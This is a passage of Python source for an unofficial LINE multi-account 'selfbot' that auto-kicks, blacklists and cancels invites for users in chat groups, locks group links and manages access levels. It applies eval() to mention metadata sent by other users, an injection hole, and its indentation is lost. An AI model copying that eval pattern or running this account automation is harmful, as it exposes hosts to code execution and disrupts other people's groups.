# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
async def mobanzu(op):
try:
if settings["restartPoint"] is not None:
a001.sendMessage(settings["restartPoint"],"[ Bots Operated Again... ]")
settings["restartPoint"] = None
if op.type == 0:
# print ("[ 0 ] END OF OPERATION")
return
if op.type == 11 or op.type == 122:
if op.type == 11: print ("[ 11 ] NOTIFIED UPDATE GROUP")
else: print ("[ 122 ] NOTIFIED UPDATE CHAT")
if settings["autoPurge"] == True:
if op.param2 in status["blacklist"]:
try:
fck1 = threading.Thread(target=lockqr, args=(op.param1,)).start()
fck2 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param1 in status["promax"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_1 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_2 = threading.Thread(target=lockqr, args=(op.param1,)).start()
d23X_3 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param2 in status["blacklist"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
try:
d23X_4 = threading.Thread(target=lockqr, args=(op.param1,)).start()
d23X_5 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param3 in status["blacklist"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
try:
d23X_6 = threading.Thread(target=lockqr, args=(op.param1,)).start()
d23X_7 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param3 == '4':
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_8 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
groupqr = a001.getGroup(op.param1)
if groupqr.preventedJoinByTicket == False:
d23X_9 = threading.Thread(target=lockqr, args=(op.param1,)).start()
d23X_10 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
try:
groupqr = a002.getGroup(op.param1)
if groupqr.preventedJoinByTicket == False:
d23X_11 = threading.Thread(target=lockqr, args=(op.param1,)).start()
d23X_12 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param3 == '1':
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_13 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
groupn = a001.getGroup(op.param1).name
if groupn not in settings["changeGroupName"][op.param1]:
progn = a001.getGroup(op.param1)
progn.name = settings["changeGroupName"][op.param1]
a001.updateGroup(progn)
d23X_14 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
else:
progn = a001.getGroup(op.param1).name
settings["changeGroupName"][op.param1] = progn
with open('settings.json', 'w') as fp:
json.dump(settings, fp, sort_keys=True, indent=4)
groupp = a001.getGroup(op.param1).pictureStatus
if groupp not in settings["changeGroupPicture"][op.param1]:
progp = a001.getGroup(op.param1)
progp.pictureStatus = settings["changeGroupPicture"]
a001.updateGroupPicture(progp)
d23X_15 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
else:
progp = a001.getGroup(op.param1).pictureStatus
settings["changeGroupPicture"][op.param1] = progp
with open('settings.json', 'w') as fp:
json.dump(settings, fp, sort_keys=True, indent=4)
except:
try:
groupn = a002.getGroup(op.param1).name
if groupn not in settings["changeGroupName"][op.param1]:
progn = a002.getGroup(op.param1)
progn.name = settings["changeGroupName"][op.param1]
a002.updateGroup(progn)
d23X_16 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
else:
progn = a002.getGroup(op.param1).name
settings["changeGroupName"][op.param1] = progn
with open('settings.json', 'w') as fp:
json.dump(settings, fp, sort_keys=True, indent=4)
groupp = a002.getGroup(op.param1).pictureStatus
if groupp not in settings["changeGroupPicture"][op.param1]:
progp = a002.getGroup(op.param1)
progp.pictureStatus = settings["changeGroupPicture"]
a002.updateGroupPicture(progp)
d23X_17 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
else:
progp = a002.getGroup(op.param1).pictureStatus
settings["changeGroupPicture"][op.param1] = progp
with open('settings.json', 'w') as fp:
json.dump(settings, fp, sort_keys=True, indent=4)
except:
pass
if op.type == 13 or op.type == 124:
if op.type == 13: print ("[ 13 ] NOTIFIED INVITE INTO GROUP")
else: print ("[ 124 ] NOTIFIED INVITE INTO CHAT")
if settings["autoPurge"] == True:
if op.param2 in status["blacklist"]:
try:
fck3 = threading.Thread(target=cancel, args=(op.param1, op.param3)).start()
fck4 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param1 in status["promax"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_18 = threading.Thread(target=blacklist, args=(op.param2,)).start()
d23X_19 = threading.Thread(target=blacklist, args=(op.param3,)).start()
try:
d23X_20 = threading.Thread(target=cancel, args=(op.param1, op.param3)).start()
d23X_21 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
try:
inv1 = op.param3.replace('\x1e',',')
inv2 = inv1.split(',')
for _mid in inv2:
d23X_22 = threading.Thread(target=cancel, args=(op.param1, _mid)).start()
d23X_23 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
try:
inv3 = op.param3.replace('\x1e',',')
inv4 = inv3.split(',')
for _mid in inv4:
d23X_24 = threading.Thread(target=cancel, args=(op.param1, _mid)).start()
d23X_25 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param2 in status["blacklist"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
try:
d23X_26 = threading.Thread(target=cancel, args=(op.param1, op.param3)).start()
d23X_27 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
try:
inv1 = op.param3.replace('\x1e',',')
inv2 = inv1.split(',')
for _mid in inv2:
d23X_28 = threading.Thread(target=cancel, args=(op.param1, _mid)).start()
d23X_29 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
try:
inv3 = op.param3.replace('\x1e',',')
inv4 = inv3.split(',')
for _mid in inv4:
d23X_30 = threading.Thread(target=cancel, args=(op.param1, _mid)).start()
d23X_31 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param3 in status["blacklist"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
try:
d23X_32 = threading.Thread(target=cancel, args=(op.param1, op.param3)).start()
d23X_33 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
try:
inv1 = op.param3.replace('\x1e',',')
inv2 = inv1.split(',')
for _mid in inv2:
d23X_34 = threading.Thread(target=cancel, args=(op.param1, _mid)).start()
d23X_35 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
try:
inv3 = op.param3.replace('\x1e',',')
inv4 = inv3.split(',')
for _mid in inv4:
d23X_36 = threading.Thread(target=cancel, args=(op.param1, _mid)).start()
d23X_37 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if M001D23 in op.param3:
if settings["autoJoin"] == True:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
try:
d23X_38 = threading.Thread(target=join, args=(op.param1,)).start()
except:
pass
else:
try:
d23X_39 = threading.Thread(target=reject, args=(op.param1,)).start()
except:
pass
if M002D23 in op.param3:
if settings["autoJoin"] == True:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
try:
d23X_40 = threading.Thread(target=join, args=(op.param1,)).start()
except:
pass
else:
try:
d23X_41 = threading.Thread(target=reject, args=(op.param1,)).start()
except:
pass
if op.type == 17 or op.type == 130:
if op.type == 17: print ("[ 17 ] NOTIFIED ACCEPT GROUP INVITATION")
else: print ("[ 130 ] NOTIFIED ACCEPT CHAT INVITATION")
if settings["autoPurge"] == True:
if op.param2 in status["blacklist"]:
try:
fck5 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param1 in status["promax"]:
if op.param2 in status["blacklist"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
try:
d23X_42 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.type == 19 or op.type == 133:
if op.type == 19: print ("[ 19 ] NOTIFIED KICKOUT FROM GROUP")
else: print ("[ 133 ] NOTIFIED DELETE OTHER FROM CHAT")
if settings["autoPurge"] == True:
if op.param2 in status["blacklist"]:
try:
fck6 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param1 in status["promax"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_43 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_44 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
d23X_45 = threading.Thread(target=invite, args=(op.param1, op.param3)).start()
except:
pass
if op.param3 in M001D23:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_46 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_47 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
d23X_48 = threading.Thread(target=backup, args=(op.param1, op.param3)).start()
d23X_49 = threading.Thread(target=antijs, args=(op.param1, op.param2)).start()
d23X_50 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param3 in M002D23:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_51 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_52 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
d23X_53 = threading.Thread(target=backup, args=(op.param1, op.param3)).start()
d23X_54 = threading.Thread(target=antijs, args=(op.param1, op.param2)).start()
d23X_55 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param3 in M003D23:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_56 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_57 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
d23X_58 = threading.Thread(target=invite, args=(op.param1, op.param3)).start()
d23X_59 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.type == 32 or op.type == 126:
if op.type == 32: print ("[ 32 ] NOTIFIED CANCEL INVITATION GROUP")
else: print ("[ 126 ] NOTIFIED CANCEL CHAT INVITATION")
if settings["autoPurge"] == True:
if op.param2 in status["blacklist"]:
try:
fck7 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param1 in status["promax"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_60 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_61 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
d23X_62 = threading.Thread(target=invite, args=(op.param1, op.param3)).start()
except:
pass
if op.param3 == M001D23:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_63 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_64 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
d23X_65 = threading.Thread(target=backup, args=(op.param1, op.param3)).start()
except:
pass
if op.param3 == M002D23:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_66 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_67 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
d23X_68 = threading.Thread(target=backup, args=(op.param1, op.param3)).start()
except:
pass
if op.param3 == M003D23:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_69 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_70 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
d23X_71 = threading.Thread(target=invite, args=(op.param1, op.param3)).start()
except:
pass
if op.type == 55:
print ("[ 55 ] NOTIFIED READ MESSAGE")
if settings["autoPurge"] == True:
if op.param2 in status["blacklist"]:
try:
fck8 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.type == 25 or op.type == 26:
# if op.type == 25: print ("[ 25 ] SEND MESSAGE")
# else: print ("[ 26 ] RECEIVE MESSAGE")
if settings["autoPurge"] == True:
if op.param2 in status["blacklist"]:
try:
fck9 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.type == 22 or op.type == 24:
if op.type == 22: print ("[ 22 ] NOTIFIED INVITE INTO ROOM")
else: print ("[ 24 ] NOTIFIED LEAVE ROOM")
try:
a001.leaveRoom(op.param1)
except:
try:
a002.leaveRoom(op.param1)
except:
try:
a003.leaveRoom(op.param1)
except:
pass
if op.type == 25 or op.type == 26:
if op.type == 25: print ("[ 25 ] SEND MESSAGE")
else: print ("[ 26 ] RECEIVE MESSAGE")
global cmd
global text
global groupParam
msg = op.message
text = msg.text
reply = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 0 or msg.toType == 1 or msg.toType == 2:
if msg.toType == 0:
if sender != a001.profile.mid:
to = sender
else:
to = receiver
if msg.toType == 1:
to = receiver
if msg.toType == 2:
to = receiver
if msg.contentType == 1:
if sender in creator or sender in owner:
if M001D23 in settings["updatePict"]:
path = a001.downloadObjectMsg(msg.id)
del settings["updatePict"][M001D23]
a001.updateProfilePicture(path)
a001.sendReplyMessage(reply,receiver,"[ Profile Picture ]\nSuccess Change Profile Picture")
if M002D23 in settings["updatePict"]:
path = a002.downloadObjectMsg(msg.id)
del settings["updatePict"][M002D23]
a002.updateProfilePicture(path)
a002.sendReplyMessage(reply,receiver,"[ Profile Picture ]\nSuccess Change Profile Picture")
if M003D23 in settings["updatePict"]:
path = a003.downloadObjectMsg(msg.id)
del settings["updatePict"][M003D23]
a003.updateProfilePicture(path)
a003.sendReplyMessage(reply,receiver,"[ Profile Picture ]\nSuccess Change Profile Picture")
if msg.contentType == 13:
if settings["addowner"] == True:
if sender in creator:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["owner"]:
a001.sendReplyMessage(reply,receiver,"{} Already In Owner Access".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addowner"] = False
else:
if msg.contentMetadata["mid"] not in status["blacklist"]:
status["owner"].append(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Recruit To Owner".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addowner"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser In Blacklist")
settings["addowner"] = False
if settings["delowner"] == True:
if sender in creator:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["owner"]:
status["owner"].remove(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Expel From Owner".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["delowner"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser Not In Owner Access")
settings["delowner"] = False
if settings["addadmin"] == True:
if sender in creator or sender in owner:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["admin"]:
a001.sendReplyMessage(reply,receiver,"{} Already In Admin Access".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addadmin"] = False
else:
if msg.contentMetadata["mid"] not in status["blacklist"]:
status["admin"].append(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Recruit To Admin".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addadmin"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser In Blacklist")
settings["addadmin"] = False
if settings["deladmin"] == True:
if sender in creator or sender in owner:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["admin"]:
status["admin"].remove(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Expel From Admin".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["deladmin"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser Not In Admin Access")
settings["deladmin"] = False
if settings["addstaff"] == True:
if sender in creator or sender in owner or sender in admin:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["staff"]:
a001.sendReplyMessage(reply,receiver,"{} Already In Staff Access".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addstaff"] = False
else:
if msg.contentMetadata["mid"] not in status["blacklist"]:
status["staff"].append(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Recruit To Staff".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addstaff"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser In Blacklist")
settings["addstaff"] = False
if settings["delstaff"] == True:
if sender in creator or sender in owner or sender in admin:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["staff"]:
status["staff"].remove(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Expel From Staff".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["delstaff"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser Not In Staff Access")
settings["delstaff"] = False
if settings["addbots"] == True:
if sender in creator or sender in owner:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["mybots"]:
a001.sendReplyMessage(reply,receiver,"{} Already In Squad List".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addbots"] = False
else:
if msg.contentMetadata["mid"] not in status["blacklist"]:
status["mybots"].append(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Add To Squad".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addbots"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser In Blacklist")
settings["addbots"] = False
if settings["delbots"] == True:
if sender in creator or sender in owner:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["mybots"]:
status["mybots"].remove(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Delete From Squad".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["delbots"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser Not In Squad List")
settings["delbots"] = False
if settings["addban"] == True:
if sender in creator or sender in owner:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["blacklist"]:
a001.sendReplyMessage(reply,receiver,"{} Already In Blacklist".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addban"] = False
else:
status["blacklist"].append(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Add To Blacklist".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addban"] = False
if settings["delban"] == True:
if sender in creator or sender in owner or sender in admin:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["blacklist"]:
status["blacklist"].remove(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Delete From Blacklist".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["delban"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser Not In Blacklist")
settings["delban"] = False
if msg.contentType == 0:
if text is None:
return
else:
hellterhead = command(text)
hlth = " ".join(hellterhead.split())
for hlth in hellterhead.split(' & '):
if hlth == "help":
if sender in creator or sender in owner or sender in admin or sender in staff:
sendFooter(receiver,str(helpCmd))
elif hlth == "protection":
if sender in creator or sender in owner or sender in admin or sender in staff:
sendFooter(receiver,str(proCmd))
elif hlth == "group":
if sender in creator or sender in owner or sender in admin or sender in staff:
sendFooter(receiver,str(groupCmd))
elif hlth == "access":
if sender in creator or sender in owner or sender in admin or sender in staff:
sendFooter(receiver,str(accessCmd))
elif hlth == "option":
if sender in creator or sender in owner or sender in admin or sender in staff:
sendFooter(receiver,str(optCmd))
elif hlth == "settings":
if sender in creator or sender in owner or sender in admin or sender in staff:
sendFooter(receiver,str(setCmd))
elif hlth.startswith("allowliff"):
if sender in creator or sender in owner or sender in admin or sender in staff:
try:
allowLiff()
a001.sendReplyMessage(reply,receiver,"Flex Mode Enable")
except:
a001.sendMessage(receiver,"line://app/1602687308-GXq4Vvk9/?type=text&text=セルボットDRE!")
elif hlth == "mention" or hlth == "tagall":
group = a001.getGroup(receiver)
memb = [contact.mid for contact in group.members]
a001.datamention(receiver,"{}".format(group.name),memb)
elif hlth == "reboot":
if sender in creator or sender in owner:
a001.sendMessage(receiver,"[ Rebooting... ]")
settings["restartPoint"] = receiver
restartProgram()
elif hlth == "shutdown":
if sender in creator or sender in owner:
a001.sendMessage(receiver,"[ Turn Off Program ]")
sys.exit('\n》》》》PROGRAM TERMINATED《《《《\n')
elif hlth == "clearchat":
if sender in creator or sender in owner or sender in admin:
for x in Botslist:
x.removeAllMessages(op.param2)
for z in Botslist:
z.sendReplyMessage(reply,receiver,"[ All Chat Cleared ]")
elif hlth == "creator":
sendFooter(receiver,str(dreX53))
elif hlth == "about":
sendFooter(receiver,str(aboutCmd))
elif hlth == "me":
contact = a001.getContact(sender)
a001.sendContact(receiver, contact.mid)
elif hlth == "mid":
contact = a001.getContact(sender)
a001.sendReplyMessage(reply,receiver, "{}".format(contact.mid))
elif hlth.startswith("mid "):
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
mcont = ""
for ls in lists:
mcont += "{}".format(str(ls))
a001.sendReplyMessage(reply,receiver,str(mcont))
elif hlth.startswith("contact "):
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
contact = a001.getContact(ls)
cont = contact.mid
a001.sendContact(receiver, cont)
elif hlth == "ping":
a001.sendMessage(receiver,"1")
a002.sendMessage(receiver,"2")
a003.sendMessage(receiver,"3")
elif hlth == "respon":
if sender in creator or sender in owner or sender in admin or sender in staff:
a001.sendReplyMessage(reply,receiver,"[ {} ]".format(resp1))
a002.sendReplyMessage(reply,receiver,"[ {} ]".format(resp2))
a003.sendReplyMessage(reply,receiver,"[ {} ]".format(resp3))
elif hlth == "speed":
if sender in creator or sender in owner or sender in admin or sender in staff:
a001.sendReplyMessage(reply,receiver,logspeed())
a002.sendReplyMessage(reply,receiver,logspeed())
a003.sendReplyMessage(reply,receiver,logspeed())
elif hlth == "debug":
if sender in creator or sender in owner or sender in admin or sender in staff:
a001.sendReplyMessage(reply,receiver,debug())
a002.sendReplyMessage(reply,receiver,debug())
a003.sendReplyMessage(reply,receiver,debug())
elif hlth == "ginfo":
if sender in creator or sender in owner or sender in admin or sender in staff:
group = a001.getGroup(receiver)
try:
gCreator = group.creator.displayName
except:
gCreator = "Not Found"
if group.invitee is None:
gPending = "0"
else:
gPending = str(len(group.invitee))
if group.preventedJoinByTicket == True:
gQr = "Clossed"
gTicket = "Nothing"
else:
gQr = "Opened"
gTicket = "https://line.me/R/ti/g/{}".format(str(a001.reissueGroupTicket(group.id)))
hlthX = "[ Group Info ]"
hlthX += "\n- Group Name: {}".format(str(group.name))
hlthX += "\n- Group ID: {}".format(group.id)
hlthX += "\n- Creator: {}".format(str(gCreator))
hlthX += "\n- Member: {}".format(str(len(group.members)))
hlthX += "\n- Pending: {}".format(gPending)
hlthX += "\n- Group URL: {}".format(gQr)
hlthX += "\n- Group Ticket: {}".format(gTicket)
a001.sendReplyMessage(reply,receiver,hlthX)
elif hlth == "openqr":
if sender in creator or sender in owner or sender in admin:
group = a001.getGroup(receiver)
group.preventedJoinByTicket = False
a001.updateGroup(group)
gurl = a001.reissueGroupTicket(receiver)
a001.sendReplyMessage(reply,receiver,"QR Group Opened")
a001.sendReplyMessage(reply,receiver,"line://ti/g/" + gurl)
elif hlth == "closeqr":
if sender in creator or sender in owner or sender in admin:
group = a001.getGroup(receiver)
group.preventedJoinByTicket = True
a001.updateGroup(group)
a001.sendReplyMessage(reply,receiver,"QR Group Closed")
elif hlth == "leave":
if sender in creator or sender in owner or sender in admin:
for bot in Botslist:
bot.leaveGroup(receiver)
elif hlth.startswith("leave "):
if sender in creator or sender in owner or sender in admin:
spl = hlth.replace("leave ","")
if spl == "1":
a001.leaveGroup(receiver)
if spl == "2":
a002.leaveGroup(receiver)
if spl == "3":
a003.leaveGroup(receiver)
elif hlth == "join":
if sender in creator or sender in owner or sender in admin:
G = a001.getGroup(receiver)
G.preventedJoinByTicket = False
a001.updateGroup(G)
links = a001.reissueGroupTicket(receiver)
a002.acceptGroupInvitationByTicket(receiver,links)
a003.acceptGroupInvitationByTicket(receiver,links)
G = a001.getGroup(receiver)
G.preventedJoinByTicket = True
a001.updateGroup(G)
elif hlth == "blacklist" or hlth == "banlist":
if sender in creator or sender in owner or sender in admin or sender in staff:
if len(status["blacklist"]) > 0:
h = [a for a in status["blacklist"]]
k = len(h)//20
for aa in range(k+1):
if aa == 0:dd = '┏━ Blacklist User';no=aa
else:dd = '';no=aa*20
msgas = dd
for a in h[aa*20:(aa+1)*20]:
no+=1
if no == len(h):
msgas+='\n┣ {}. @!'.format(no)
else:
msgas += '\n┣ {}. @!'.format(no)
msgas += '\n┗━━━━'
sendMention(to, msgas, h[aa*20:(aa+1)*20])
else:
a001.sendReplyMessage(reply,receiver,"[ Doesn't Have Any Blacklist User ]")
elif hlth == "clearban":
if sender in creator or sender in owner or sender in admin:
if len(status["blacklist"]) > 0:
a001.sendReplyMessage(reply,receiver, "[ {} User Cleared ]".format(len(status["blacklist"])))
status["blacklist"].clear()
else:
a001.sendReplyMessage(reply,receiver,"[ Doesn't Have Any Blacklist User ]")
elif hlth == "squad list":
if sender in creator or sender in owner or sender in admin or sender in staff:
ma = ""
a = 0
for ls in mybots:
a = a + 1
end = '\n'
ma += '┣ ' + str(a) + ". " +a001.getContact(ls).displayName + "\n"
a001.sendReplyMessage(reply,receiver, "┏━ 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ.\n┣━━━━ List Bots\n"+ma+"┗━ Total [ %s ] Bots" %(str(len(mybots))))
elif hlth == "view bots":
if sender in creator or sender in owner or sender in admin or sender in staff:
ma = ""
a = 0
for ls in Bots:
a = a + 1
end = '\n'
ma += '┣ ' + str(a) + ". " +a001.getContact(ls).displayName + "\n"
a001.sendReplyMessage(reply,receiver, "┏━ 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ.\n┣━━━━ List Bots\n"+ma+"┗━ Total [ %s ] Bots" %(str(len(Bots))))
elif hlth == "view access":
if sender in creator or sender in owner or sender in admin or sender in staff:
ma = ""
mb = ""
mc = ""
md = ""
a = 0
b = 0
c = 0
d = 0
for ls in creator:
a = a + 1
end = '\n'
ma += '┣ ' + str(a) + ". " +a001.getContact(ls).displayName + "\n"
for ls in owner:
b = b + 1
end = '\n'
mb += '┣ ' + str(b) + ". " +a001.getContact(ls).displayName + "\n"
for ls in admin:
c = c + 1
end = '\n'
mc += '┣ ' + str(c) + ". " +a001.getContact(ls).displayName + "\n"
for ls in staff:
d = d + 1
end = '\n'
md += '┣ ' + str(d) + ". " +a001.getContact(ls).displayName + "\n"
a001.sendReplyMessage(msg.id, to, "┏━ 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ.\n┣━━━━ List Access\n┣━━━━ Creator\n"+ma+"┣━━━━ Owner\n"+mb+"┣━━━━ Admin\n"+mc+"┣━━━━ Staff\n"+md+"┗━ Total [ %s ] Access" %(str(len(creator)+len(owner)+len(admin)+len(staff))))
elif hlth.startswith("add owner"):
if sender in creator:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for xbot in Botslist:
for xtarg in targets:
try:
xbot.findAndAddContactsByMid(xtarg)
except:
pass
for target in targets:
try:
status["owner"].append(target)
sendMention(to,"[ Add Owner ]\nUser @! Added To Owner Access",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Add Owner ]\nCreator Permission")
elif hlth.startswith("del owner"):
if sender in creator:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
status["owner"].remove(target)
sendMention(to,"[ Delete Owner ]\nUser @! Deleted From Owner Access",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Delete Owner ]\nCreator Permission")
elif hlth.startswith("add admin"):
if sender in creator or sender in owner:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for xbot in Botslist:
